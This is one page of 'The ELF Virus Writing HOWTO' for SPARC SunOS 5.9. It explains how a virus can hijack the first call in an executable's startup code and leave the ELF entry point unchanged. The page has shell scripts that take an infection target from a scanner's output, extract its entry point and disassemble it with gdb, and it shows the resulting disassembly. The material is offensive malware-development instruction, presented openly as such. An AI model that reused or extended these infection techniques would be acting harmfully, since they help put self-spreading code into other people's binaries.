The ELF Virus Writing HOWTO: sparc-sunos5.9
Prev 

10. The entry point

 

The longest part of the journey is said to be the passing of the gate.

 Marcus Terentius Varro

If we decide to leave entry_point as it is, we have to patch something else. One approach is to disassemble the code, starting at entry_point, find the first call (or jmp) and abuse it. This requires way too much intelligence for a virus, though. But then we are operating in a homogeneous environment, having one compiler and one C run-time library for all. The startup code should be the same for every executable.

Command: pre/sparc-sunos5.9/entry_point/gdb/SunOS.sh 
#!/usr/xpg4/bin/sh
pre/sparc-sunos5.9/entry_point/gdb_core.sh \
| /usr/xpg4/bin/sed -ne '/\<call\>/,/\<restore\>/p' \
| pre/sparc-sunos5.9/magic_elf/gdb_format.pl

We work on the shell found in A kingdom for a shell. The tool from Extracting e_entry retrieves the entry point. On some shells a read from a pipe opens a sub-shell, i.e. it does not export the variables to the surrounding scope. The while loop is executed just once. Its only purpose is to build a block for read.

Command: pre/sparc-sunos5.9/entry_point/gdb_core.sh 
#!/usr/xpg4/bin/sh
shell=$( /usr/xpg4/bin/sed 1q \
	out/sparc-sunos5.9/scanner/segment_padding/infect )

tmp/sparc-sunos5.9/evil_magic/e_entry ${shell} \
| while read entry_point offset
do
  /usr/bin/echo "[entry_point=${entry_point}]"
  /opt/sfw/bin/gdb ${shell} -q <<EOT 2>&1
	
	break *0x${entry_point}
	run
	disassemble 0x${entry_point} 0x${entry_point}+0x100
EOT
done

Output: out/sparc-sunos5.9/entry_point/sh.gdb 
0x17fb8 <_start+172>:         call          0x44034 <atexit>
0x17fbc <_start+176>:         nop           
0x17fc0 <_start+180>:         sethi         %hi(0x32c00), %o0
0x17fc4 <_start+184>:         call          0x44034 <atexit>
0x17fc8 <_start+188>:         or            %o0, 0x2e8, %o0     ! 0x32ee8 <_fini>
0x17fcc <_start+192>:         sethi         %hi(0x44400), %o0
0x17fd0 <_start+196>:         ld            [ %o0 + 0x310 ], %o0! 0x44710 <___Argv+4>
0x17fd4 <_start+200>:         tst           %o0
0x17fd8 <_start+204>:         bne           0x17ffc <_start+240>
0x17fdc <_start+208>:         nop           
0x17fe0 <_start+212>:         sethi         %hi(0x44400), %o0
0x17fe4 <_start+216>:         ld            [ %o0 + 0x314 ], %o0! 0x44714 <___Argv+8>
0x17fe8 <_start+220>:         tst           %o0
0x17fec <_start+224>:         be            0x17ffc <_start+240>
0x17ff0 <_start+228>:         nop           
0x17ff4 <_start+232>:         call          0x44034 <atexit>
0x17ff8 <_start+236>:         nop           
0x17ffc <_start+240>:         call          0x32e98 <_init>
0x18000 <_start+244>:         nop           
0x18004 <_start+248>:         mov           %l0, %o0
0x18008 <_start+252>:         mov           %l1, %o1

PrevHome 
Additional code segments